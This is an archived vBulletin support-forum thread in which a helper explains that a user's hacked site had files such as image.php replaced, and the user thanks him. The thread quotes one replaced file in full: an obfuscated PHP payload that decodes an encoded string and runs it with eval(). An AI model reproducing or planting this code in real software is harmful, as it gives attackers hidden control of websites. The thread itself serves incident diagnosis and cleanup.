Go Back   vb.org Archive > vBulletin 4 Discussion > vB4 General Discussions
FAQ Community Calendar Today's Posts Search

Reply
 
Thread Tools Display Modes
  #31  
Old 10-09-2015, 11:56 PM
TheLastSuperman's Avatar
TheLastSuperman TheLastSuperman is offline
Senior Member
 
Join Date: Sep 2008
Location: North Carolina
Posts: 5,844
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Okay so after working with Flibnipktz on his issue it was determined that there was something else "at play" on the site. It was an issue that would have followed him to a new host most certainly however this was not related to his email problems from what was seen. I will get with him tomorrow to see what specifics he will allow me to share if any, after all that's his prerogative on what is to be disclosed regarding his site.

Edit: As mentioned below by Flibnipktx, his site was hacked and some valid files replaced with files of the same name containing nothing but base64 code.

What I found odd was the fact the files replaced, must of had very similar "default" vBulletin code in them because they functioned as normal (example image.php was all encoded/payload/base64 and with different timestamp) despite having the following contents:

PHP Code:
<?php for($o=0,$e='&\'()*+,-.:]^_`{|,,,|-((.(*,|)`)&(_(*,+)`(-(,+_(-(.(:(](^(_(`({)]+`+{+|,&-^-_(^)](](^(_(^(:(`(,-_(.-_(](:(,+_(-+_(--_(`(.(.+`+_(-(:(.(,+_(--^(.-_(:+{(]+{(:(:(^(`(,(,(,(.(:(:(:+{(,(_(:(_+_(-)](](,(:-_(,,&(_,&+_(-(`(:(.(,(.(.+_(-(.+`(,-_(.(`(](.(_-^(,)](:({(,(,(_(](.(](.-^(,(,(`(,(](:(.({(]-^+_(-(^+_(-(^(.(](,+`(`,&(:+{(.-^(_-_(`-_(]-^+_(-+{(:-^+_(--^(,(_(:(](,(_(`)](:,&(.(,+_(-+{+_(-+|(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](.(.(.(](,+_(-(,,&(^(`(`(^(]-^(,(.(,(.(:-_+_(-(^(_)](.(.(.(](,+_(-(,,&(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](:(^(.-^(,(_(_(](]+|(`(`(.(.+_(--^(,(.(:+{+_(-+`(`+_(-(:(`(:-_(,,&(,-_(.+{(,+_(-(:)](`+_(-(.+{(_+_(-(_+`+_(-)]+_(-(_(,(.(:(`(`)]+_(-,&(:+`+_(--^(.(.(`(_(,-^(:(`(](]+_(-,&+_(-)](^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+`(:(](:(_(:(,(,-_(`+{(]-^(.(`(`-_+_(-(,(,(^(^-^+_(-(`(,+`(:(_(:+|+_(-({(`+{(],&(,(.(,(.(:-_+_(-(^+_(-)](](:(](^(_(:(`)](^-_(_(:(^+`(_+`(`+_(-(](^(_+_(-(^+{(^+{(^(,+_(-(.(:,&(,(:(:(_(](.(_(:(_,&+_(-(_(]-_+_(-)](^,&(,({(:+`(:+|(,)](:({(]+`(.(:(:(,(]+{(:(.(^(:(^(.(,({(:(:(:(`(]+`(:(_+_(-(.(.-_(:(^(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.(`(](,(.(.+{(.(^(:(](:(^(^(`(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+`(]+|(.(.(:({+_(-)](.(,+_(--^(.(.(.(]+_(--^(_(.+_(--_(^+{(^(,(^({(:,&(,-_(:(^(,(:(.(](:(:(](:(_(.(^-^+_(-(:+_(-({(,,&(.+`+_(-(:(.(,+_(--^(.-_(:+{(]+|(_)](`(_+_(-(]+_(--^(:+|(:+`+_(--^(:+`(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-(`+_(-(],&(.(,+_(-(:(:)](.(.(,-^(.({+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+`(,+`(.+_(-(,(_+_(-)](:+{(,-_(.(_(:+`(:(](.(,(]-^+_(-(`(,({(`(^(`(^(.+`(:(^+_(--_(.(](:(^+_(--_(.+|(^)]+_(-+|(:(](:(`(.+_(-(,(:(.(,+_(--^(:)](`-^(]+|(:(_(^-^+_(-(`(,(`(:-^(,(_(,-_(.+{(,-_(.)](`+_(-(](.(_+|(,,&(`({(,-_(:(`(:-_(,(:(:,&(,-_(_(.(`+_(-(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+`(]+|(.(.(:(_+_(-+`(:(_(,(](_,&(`-_(](.(`-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:-^(,+`(:(_(_)](,(.+_(-)](:,&(:+`(:(^(:+|+_(-+`(.-_(:({(]+|(_)](`(_+_(-(]+_(--^(:+|(:+`+_(--^(:+`(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-(`+_(-(],&(.(:+_(-({(.(^(:(^(:(](.+`(](_+_(-(`(,(^(`(^(`(,(](:(_({(_(,(.-^(:(:(,,&(.+|(^({+_(-(`(](:(`(^(:+_(-(,+{(.(,(:(^(.-_(.-^(,-^(.(_+_(-+_(-(^-^(.+{(:(](.+|(,(](:(,+_(--^(.(:(:)](,(^+_(-+`(^(:(,+`(,(.(.+_(-(.,&+_(-)](`+{(],&(.-_(.-^(,-^(.(_+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+_(-(,+`(:+|(,(_(,-_(.+{(,-_(.)](`+_(-(](`(_,&(^-^+_(-(:+_(-({(,,&(.)](,+{(.(,+_(-)](:-^(:-^+_(-)](:(,(]+`(,-^(,(:(:(:(.+`(:(^(.(,+_(-(:(:)](.(.(,-^(.({(]+`(,-^(,(:(:(:(.+`(:(^(.(,(,(.(.-_(:+`(,(`+_(-+`(^(:(,+`(,-^(:+_(-(.(^+_(-(_(:+{(,+{(:)](,)]+_(-+{(.+`(](_+_(-(`(,(^(.-^(.(^(,(.(:(.+_(-)]+_(-(^(.(_+_(-)](.+`(^(^(.,&(,(](.(.(:+|(,(](.-_+_(-(_(.(.(:(`+_(-({+_(-+`(^(:(,+`(,-^(:+_(-(`(,(](:(_({(_(,(.(:(:(,(](:(_(](^(^+_(-(:(,(^(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+`(^(.+_(-+{(,-^(`+`(`-^(,)](:(.(,(](_+`(:({(,(](:+_(-+_(-(_+_(-(`+_(-(:(:(`(:+`(^(,(`(:(,(](.(^(`(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](.(,(]+`(.+{(.(,(,+`(.+|(^+`+_(-(:(,)](:-^(:+|(],&(`+`(^+_(-(:(`(^+|(](](_+`(^(^+_(-+`(,-^(:+_(-(:(.(]+`(:+`(,+|(_+`(.+_(-(,-^(_(^(^(^+_(-(:(,(^(`(.(:+`(,(^(:,&(,+|(.(:(:+_(-(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.(`(](,(.(.+{(.(^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^(`(](](_(,+`(:(,+_(--^(.+{(^(^(,(_(,(.(:,&(:(`(:(^(:(_+_(-(.(.(:(.(^+_(--_(:(_+_(--^(^(^(,(.(:+|(:(,(:(^(:(](,-_(:-^(`+_(-(](.(_+|(,,&(`({(,-_(:(`(:-_(,(:(:,&(,-_(_(.(`+_(-(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(,)](,+`(.)](^+`(^(^(](`+_(-(.(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{(_)]+_(-(`+_(-(:(:+{(.+`+_(--^(.(,(](.(_,&(:-_(,(^(.+|(_)]+_(-(^(,-^(.(_(,(_(,+{(:-_(,(_(_,&(`-_(](.(`-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:(^(,+`(.+{(_)]+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(_(`-^(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(.+`+_(-(`(.,&(^(`(,+_(-(:(](:+{(:(`(,(:(,+|(,,&(.-_(.(.(:(](.(](^+`+_(--^(](.(`+{(_(.(_(,(:+`(,+|(_(.(`(`(,({(.(](^({(.,&(,({(:,&(:(`(,+|(:+`(,,&(_(:(.,&+_(-(:+_(-+`(^(.+_(-+{(,-^(`+`(`-^(,)](:(.(,(](_+`(:({(,(](:+_(-+_(-(_+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(:(_,&+_(-(_(]-_+_(-)](^,&(,+|(:(`(.,&(]+`(:(,(,(^(.(](:(,(,(.(.(.+_(-(_(,(](,+`(:-^(.+|(,-_(^)](,+|(:-_(:({(,({(:+_(-(^-_+_(-,&(,(^(`(.(.+_(-(:(^(:+`(,(](.(:(,)](,+|(.(,(](.(^+`(]-_(:+|(`(,+_(-+_(-(:+`(,+|(_(.(:-^(,+`(:(_(_)]+_(-+{(,(^(:+{(,(_(,,&(:(_+_(--^(_(:(.,&+_(-)](.(,(](.(,(`+_(-)](:+|(`+_(-(.+`(:+`(,(](.(:(,)](,+|(.(,(](.(^+`(]-_(:+|(`(,(](:(_({+_(-(`(.-_(:+`+_(-({(.(,(^-_+_(-(](](:(:+`(:({+_(-)](,+|(,(:(.(](:-_(:(](.(.(^(:(,(_(:(](:(:(:(^(,(_(`+`+_(-+_(-(_-^(:-^(^(_(,(^(^-_+_(-+|(,(.(,,&(:-^(,-_(.(`(:(^(.+{(:+`(,(`(_,&+_(--_(])]+_(-)](:(`(.,&+_(--_(.+_(-(,(](_(.(`(.(,(:+_(--^+_(-(.+_(-+|(:(_(,)](`-^(,(_(:+|(,)](.+{(:+`(:(](:(:(^(`+_(--^+_(--^(:(`(`-^(:(`(`+`(^+_(-(:(`(.+{(_+_(-(_+`+_(-)](^(.(,({(:+`(:+|(,)](:({(]+`(:)](:(`(,,&(.(,+_(-(_+_(--_(,(](:(_(:+|(_(,(:+`(,+|(_(.(.-^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^(`+{(],&(:)](:(`(,,&(.(,(_)]+_(--_(,(](:(_(:+|(],&(`+`(](:(:+_(-(.-^(:(](.+_(-(^-_+_(-(`(](:(`(^(:+`(,+{(:,&(]+`(.(](:)]+_(--_(_(^(^(:(,+`(,-^(:+_(-(_(:(]+`(.(,(,+{(.+|(:(:(]+{(.({(^)]+_(-(_(,-^(`(.(:({(,)](.(`(,(:(:+|(:(:(]+|(_+|(,,&(,-_(_+_(-(`,&(`(_+_(-)](:-^(,+{(:({(.(.(]+{(.(,(]-^+_(-(`(,({(`(.(:+_(-(,-_(:-_+_(-+`(.-_(.(]+_(-({(]-_(^(,(,(`(,(^(:+_(-(.,&(,(:(:+|(,(](_+`(.-^(:(](:(^(^(`(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(](.(_-^(:(^(](.(:-^(`(_(,(.(,+`(.+_(-(.+`+_(--^(:+{+_(-({(:-_(`-^(]-_(.(_+_(--_(])]+_(-(_(^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+`(:(](.+_(-(.(,+_(-)](.(`(,-_(.(`(`-^(]-_(.(_+_(--_(,)](.+{(.+_(-(.(,+_(-)](.(`(,-_(.(`(`-^(]-_(.(_+_(--_(])]+_(-(_(^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+`(:(](.+_(-(:+_(-(,-_(:-_(,(_+_(-(^(:(:+_(-(:(.(,(^(^(^+`(]-_(:+_(-(`(,+_(-+_(-(:(_(,)](.(.(:)](]+{(,(^(](^+_(-+`(,-^(:-^(:(^(:(^(:(_+_(-(.(.-_(:(^(](:(_+_(-(^(^(^+{(^(,(.-_(^(:(,+|(.(_(,(](.)](.(.(,(.(.+`(^({(^(.+_(-(:(,,&(.)](,(^(.(:(,-_(.(](`-^(]-_(.(_+_(--_(,)](]-_(:,&(_(.(,(:(:(^(](.(_(.(`(.(,,&(`({(`(_(,(.(,(](.(.(:+|(,(](`+{(]-^(.)](`+`(]+|(:(`+_(-+_(-(^+{(](.(`+{(.(.+_(-,&(:+{(,(:(.(_(:(:(](:(_(](`(_+_(-(](,-^(:,&(:-_(](.(`(`(,+|(_(:(`-_+_(-(,(_+_(-(^)](^+|(^(_+_(-(.(:-_(,,&(:(_+_(--^(:)](`-^(]-_(.(:+_(--_(])]+_(-(_+_(-(.(.)](,)](:-_(,(^(:)](:(:(](:(_+_(-(^(,(^+{(^(,(.-_(:+|(,)](:+{(,(^(_+`(`(.(,(](`-^(]+{(`({(,,&(.(`(:(`(,)](.(`(,(:(.(^(:({(]+{(:,&(_)](,(.+_(-)](:,&(:+`(:(^(:+|+_(-+`(.-_(:({(](:(_+_(-(^(^(^+{+_(-(,(`(_(:(_(^+_(-(:+`(,+|(_(.+_(-(_(,(.(:(_(_)](,(,(,-^(.+_(-(:(_+_(--_(.+_(-(,)](.-_(`-^(]-_(:(^(,+{(:(.+_(-+{(.(,(:(_(,)](,+|(,(^(:+`(:(:(,(^(_,&+_(-(.+_(-+_(-(](`(:(:(.+{+_(-({(:(.+_(-(:(_(.(_(_(^(_(`+{(^(`(,(,+_(-)](:(:(.(,(](.(`(]+_(-+`(.(:(.(_(,-^(_(.+_(-+`(^(^+_(-)](`(^(`(,(](_(_(.(^(`(`(](:(`+_(-)](:(`(^(`(,+{(](:(`(^(.)](,(:(.(:(,-_(_,&(`+`(]+|(:(.+_(-+_(-(^+{(](`(_(,(_(](^(](:(.+_(-({(:({(:(`+_(-(.(_,&+_(-+_(-(,(.(,(.(.(.(:+|(],&(`-_(],&(:,&(`+_(-(](.(_+|+_(-+`(^(_(,,&(`+{(`(,(](:(.({(.+`(.+|(:(^(,(`(.+`(](^+_(-(`(](:(`(_(:-_(:+_(-(_(:(:(`(_(:(_,&+_(-+|(.,&(^-_+_(--^(,-^(`+`(`({(.+`(:(^(,-_(.(^(:(,(](:(_+_(-(^(,(.)](^+`(,-_(`(,(](:(.({(]-^(.(^(`({(^(_(,(^(^(,+_(-(^(,-^(.(_(.+`(](.(`(`(,+|+_(-+_(-(_(`(:(_(_+|(,,&(,-_(.+{(:(](:+`(,(_(:+|+_(-)](.-_(`-^(]-_(.(:(_,&(](:(:(_(`+{(_(.(.+`(.(:+_(-({(.(^(:(^(:(](.(_(^+`+_(-,&+_(-({(:(`(`+_(-(]-^(.(:(](:(`+_(-(.+{(,-^(.(_(^-^+_(-,&(]+{(`(_(:(_(^+_(-(.-^(_(,(.+|(.(:(,(^(.(_(](.+_(-+{(,(](:+|(`)]+_(-(.(,+|(,-_(:(.(:(:(,({(_,&+_(-(.+_(-+_(-(](.(.)](`,&(,(^(_({(.+`(.-_(.-^(,-^(.(_+_(--^(^(_(,({(`-^(`,&(,(^(`+`(^+_(-(.-_(:(^(,(:(.+`+_(-(_(:(.(,(.(:-_(.)](,(_(:+|(,-^(.-_(`-^(])]+_(-)](^({(^(,(](`(`(_(:(_(](:(_({+_(-(`(](,(`)](](](.+_(-(^)](^(.+_(-({(:-_(:({+_(-({(.(`(]+`(.+|(:(:+_(--_(.(_(^-^(`({(,,&(.(`(:(`(,)](.(`(,(:(.(^(:({(]+{(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(](`(`(_(.)](](_(`(`+_(-({(_(_(`(.(,(`(_+|(:+|(,)](_+_(-(^+{(:(,(,+|(`+{(]-^(:)](_+{(.+{(.(:(](^+_(-,&(,({(:)](:(_+_(-+`(:(_(,(](_(.(`(.(,+`(_)]+_(-(.(,(.(](.(`+{(^(:(_(:(.({(_(,(](:(^-_(,(.(.(:+_(--^(^(_(,,&(_-_+_(-)](,+|(:+|+_(-+`(.-_(:({(](:(_+_(-(^+`(^-^(])](.(^(:+{(]({(`+`(](:(](,(^-_(_(.(:-^(:+|(`+{(_(.(^+{+_(-)](,+|(.(]+_(-({(.(:(.(.(,-^(_,&+_(-(.(,+_(-(](`(`(,+_(--^(.-_(,(`(]+`(_({(`({(]-_(:(`+_(-({(^(,(]+{+_(-+`(,,&(:-^(,(:(](^(`+{(`({(^+{+_(-)](](](.-^(,(^(,-^(.+{(:(_(:,&(]({(_(:(_,&(_+_(-(]+|(:-_(`+{+_(-+|(:+`(:(,(,(_(:(_(](.(_+{+_(-(_(,,&(.(,(^)]+_(-(](](:(`(_(.+`(](:(`+`(_(,(](:(^-_(_(.(:-^(:+|(`+{(_(.(^+{(^(,(]-^(:+_(-(^(`(,+`(:(,+_(-)](.(,(^(`+_(-(_(](:(`(_(.+`(](_(_+{(^+{(`(:(_(](](.(`-^(:+|(`+{(_(.(^+{(^(,(.+`(:(^+_(-,&(:({(:-_+_(--_(.(,+_(--^(^(_(,,&(`-^(`,&(,({(`+`(^+_(-(](,(^-_(_(.(]+|(]+{(`({(_(.(^+{(^(,(.+`(:(^(,)](.(_(:)]+_(-({(.(,+_(--^(^(_(,,&(`+{(_(.(_(,(^+`(_(:(](:(:(:(,({(.,&(^)](^(.(])]+_(-,&+_(-(.(:(_(:,&(]({(`+_(-(^+|(_(.(]+|(]+{(`({(_(.(^+{+_(-)](,+|(:(,(,(_(.(^(.(^(,-^(_,&+_(-(.(,+_(-(](.(_)](^(:(_(:(.-^(_(,(:(`(^+|(](](_+`(^(.+_(-,&(]+{(.+_(-(:(](,+{(.+_(-+_(--^(_+`(:(:+_(-(:(.(,(^(^(`({(,,&(.(`(:(`(,)](.(`(,(:(.(^(:({(]+{(:,&(_)](,+_(-(,(_(:(:(.+{+_(--^(,+|(,-_(:(.(:(:(,({(_,&+_(-(.+_(-+_(-(](.(^({(.(.(_(,(^+`(,(:(.+|(`-^(]-_(.(_(,+{(]-_(^(_(`(,(.-^(,(.(:+`(,)](.(.(`(_+_(-({(:(,(](_+_(-(`+_(-)](:(](:+|+_(--^(:(,(,(.(_+`(_(`(^(^(_(^+_(-)]+_(-(_(,-^(.(](`(_(,(](.(_(,(_(.(_(`(_(^)](`+{+_(-(_(^,&(,-_(:(`(.-_(](^(:,&+_(--_(.(_(:+`(]+{(_(:+_(-(,(^(.(,-^(:+_(-(:+_(-(,(^(`(:(.(^(,+_(-(`(](](.(]-_(:-_(,)](_+_(-(^+{(^(,(,-_(:(,(,(.(.(^(`(_(])](,+`(`,&(.-^(,(^(`(,(_(.(_(,(^+`+_(-(`(](,(^-_(,-^(.)](](^+_(-(`(,(.(:(](`+_(-(.+`(.(,+_(--^(:({(.(^+_(--_(:(`+_(--^(^(_(,({(`-^(`+{+_(-)](.(_+_(-+`(.-_(.(](,,&(.(,(](.+_(-+_(-(,(:(`(,(`(,(](:(^)](_(:(:+_(-(^+|(_(.(]+|+_(-(.+_(-(:(^(_+_(-(.(:+|+_(-(.(.(:(,(_(.(^(:(.(,-^(_,&+_(-+_(-(^(.(]+|(`-^(`,&(,)](`+`(^+_(-(](,(^-_(_(.(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(:(,(_(:(,(](](_(`(`(,+{+_(-+_(-(_(](:(_(_)]+_(-(.+_(-(:(:(,(_+_(-(,(](](_(`(`(,+{+_(-+_(-(_(.(:(_(_+|(,,&(`({(_(.(.-_(^(:(_(:(:(_(,(_(:)](:(:(,(.(.(:+_(--^+_(-+`(,+`(.+_(-(,(_+_(-+`(:(.+_(-)](:)](.(.(,(:(:(`(](:(^+{+_(-(,(.+`(,(_+_(-+`(:(.+_(-)](:)](.(.(,(:(:(`(](:(^+`(]-_(:+_(-(`(,(^+_(-(.-^(_(,(](:(:(:(,(`(:(_(^(:+_(-+{(,,&(`+`(:+_(-(,+{(.(,(:(^(:)](.-_+_(-({(:+_(-(^(:+_(--_(](.(.)](.+_(-(:(^(.(,+_(-(:(:)](.(.(,-^(.({+_(--^(^(_(,({(`+{(_(.+_(-(`(^)](_(:(.-_(:+`+_(-({(.(,(^-_+_(-(](](:(:+`(:({+_(-)](,+|+_(-)](.(.(:(:(,(`(.)](_)]+_(-(`+_(-(:(:(`(:+`(](:(.({+_(-(.+_(-(^(.(^(,(:(.(,(^+`+_(--^(:(](:(`(.+_(-(,-_(:(,(](.(_-^(:(^(](.(`-^(]+{(`({(_(.(:(`(:(^+_(-)](:(_(,(:(.+|(`-^(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(](:(:+_(-(.-^(:(](:(^(^)](,(.(,-^(:+|(`+_(-(]-^(:(,(](:(`+_(-(.+{(_+_(-(]+|(^(:+_(--^+_(-({(:(`(:(,(,+|(`+{(,(.(.+{(.(^(:(](:(^(](]+_(-,&(,({(,,&(:(_+_(-+`(:(_(,(](_(:(.,&+_(-(:+_(-+`(](_(,(,(,(](:+_(-(,(_(,(^(.(:(,-_(.(](`-^(]-_(.(_+_(--_(])]+_(-(_(^({(^(,(,-_(:-_+_(-)](.-_(:-_(,,&(_,&(^-^+_(-(:+_(-({(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+`(^(:(,+`(,-^(:+_(-(`+_(-(]-^(:(,(](:(`+_(-(.+{(_+_(-(:({(:+|(^,&(](](:(^(:(_(_(,(`(`(,(](`(`(`+_(-(:({(.-_(`+|(.(](,(,+_(-(`(_-_+_(-({(:({(:({+_(-(:(:+|(]+|(`-^(:+|(^(_(,({(_-_(`,&(:(^+_(-(,(.(^(,(^+_(-,&(.(.(,(,(_,&(^(_(,(^(,-_(_(.(_(,(:+`(,+|(_(.+_(-(_(,-^(.({(](_(,(_+_(-(.(`+`(`,&(,)](`+`(](:(:+_(-(`(.(,({(`({+_(-(.(.,&(:+{+_(-,&(,+`(:-^(,({(]-^(.(](,+{(^(,(:({(:+|+_(-+{(,,&(`+`+_(-)](,-_(:-^+_(-+`(:-^(.-_(](:(_+_(-(^(^(^+{(](.(.)](`,&(,)](_-^(]-^+_(-(^+_(-+_(-(.-^+_(-+_(-(_,&(^(_(,(^(,-_(_(.+_(-(`(^)](,(:(.+|(`-^(.+{(.(.(^(:(,(_(:(](:-_(:({(,,&(:+`(,)]+_(-(^(.(`+_(--^(.+`(](.+_(-(`+_(-({(,,&(:-^+_(-+`(:(,(](.(_(:(`-_+_(-(,(_+_(-(^(^(]-_+_(-({(.(_(.+{(,(:(.(:+_(-)](.(_(:(`+_(-({(.,&(^(:(,+_(-(](:(`(_(:+`(](:(_({+_(-(`(](,(.-^(:(](:(_(^+{+_(-(:+_(-)](.(_(,(_(,-_(.+{(,-_(.)](`-^(]-_(.(_+_(--_(])](_+_(-(-(_(*,*)`(-(-)^*&,|-(,*(.(*,++^(*,|+`(:)^(*,|(^(^(:-^,:,,(.(*,|)_)\'),(:-^(*,.+^(*,++^(*,|+`+`)`(*,|)^-`,+,_-),+-^(*,*({)`*&,),.-((.(.(*,.+^(*,++^(*,|+`+`)_)_)*(:(^(.(*,.+^(*,++^(^(^(*,|+`+`(:(:)^-`-`,:,,(.(\'*&,:-)-),+-*(.(*+|+)*++(+,*++((:(:-^(*+|*)*|*|*^*:*+)`(,(**.+*+*+&+|*)*|*|*^*:*++|+,*\'+(+))^(*+|+&*|+)+*)`(,(**.+*+*+&+|+&*|+)+*+|+,*\'+(+))^(*+|*-*++*)`(,(**.+*+*+&+|*-*++*+|+,*\'+(+))^-`(*,^)`(*+|*)*|*|*^*:*++^(-,^,+-:(-+`)^,:,,(.,+,`-&-*-:(.(*,^(:(:-^(*,^)`(*+|+&*|+)+*+^(-,^,+-:(-+`)^-`,:,,(.,+,`-&-*-:(.(*,^(:(:-^(*,^)`(*+|*-*++*+^(-,^,+-:(-+`)^-`,:,,(.(\'*&,,-+,{,)-*,:,|,{+|,+-.,:-)-*-)(.(-,*,+,)-(-:-&-*(-(:(:-^,+-,,\',_(.(-,,-+,{,)-*,:,|,{(&,*,+,)-(-:-&-*(.(*,+(_(*,^(:-^,:,,(.(\'(*,^(:-^-(,+-*-+-(,{)^-`(*,+,_)`*&-)-*-(,_,+,{(.(*,+(:)^(*,^,_)`*&-)-*-(,_,+,{(.(*,^(:)^(*-(,_)`(*,+,_(+(*,^,_)^(*,,,_)`(*,+,_(`(*-(,_)^,,,|-((.(*,|)`)&)^(*,|)_(*,,,_)^(*,|(^)`(*,^,_(:-^(*-&)`*&-)-+,(-)-*-((.(*,+(_(*,|(_(*,^,_(:)^(*,*({)`(((*,^((+{(((*-&(()^-`,:,,(.(*-(,_(:-^(*-&)`*&-)-+,(-)-*-((.(*,+(_(*,,,_(_(*-(,_(:)^(*,^)`*&-)-+,(-)-*-((.(*,^(_)&(_(*-(,_(:)^(*,*({)`(((*,^((+{(((*-&(()^-`-(,+-*-+-(,{(.(*,*(:)^-`(-(:)^-`(*,*)`*&,*,+,)-(-:-&-*(.(*,*(_(*,^(:)^,+-,,\',_(.(*,*(:)^',$d='';@ord($e[$o]);$o++){if($o<16){$h[$e[$o]]=$o;}else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d); ?>
I found eerily similar listed on Securi's site with a good explanation as to what this file can do and long story short it wasn't good at all.

After removing all malicious/infected files and overwriting all files and ensuring it was up-to-date everything seems to have resolved itself.
Reply With Quote
  #32  
Old 10-10-2015, 12:32 AM
Flibnipktz Flibnipktz is offline
 
Join Date: Jul 2013
Posts: 22
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Serious points, TLS. For everyone else reading, TLS (on behalf of URLJet) determined that our site was hacked. Apparently one of many vb sites, and it might never have been discovered it if not for these recent issues.

So for now at least, staying with URLJet... if I'd up and decided to move, previous to posting here, our problems would have followed right along with us. Some major cleanup and hopefully on to better things.

Thanks Dave, RB67, I appreciate the thoughts and feedback.
Reply With Quote
Благодарность от:
TheLastSuperman
Reply


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 01:44 AM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.06235 seconds
  • Memory Usage 2,225KB
  • Queries Executed 11 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)bbcode_php
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (2)pagenav_pagelink
  • (2)post_thanks_box
  • (1)post_thanks_box_bit
  • (2)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (1)post_thanks_postbit
  • (2)post_thanks_postbit_info
  • (2)postbit
  • (2)postbit_onlinestatus
  • (2)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • fetch_musername
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • post_thanks_function_fetch_thanks_bit_start
  • post_thanks_function_show_thanks_date_start
  • post_thanks_function_show_thanks_date_end
  • post_thanks_function_fetch_thanks_bit_end
  • post_thanks_function_fetch_post_thanks_template_start
  • post_thanks_function_fetch_post_thanks_template_end
  • pagenav_page
  • pagenav_complete
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete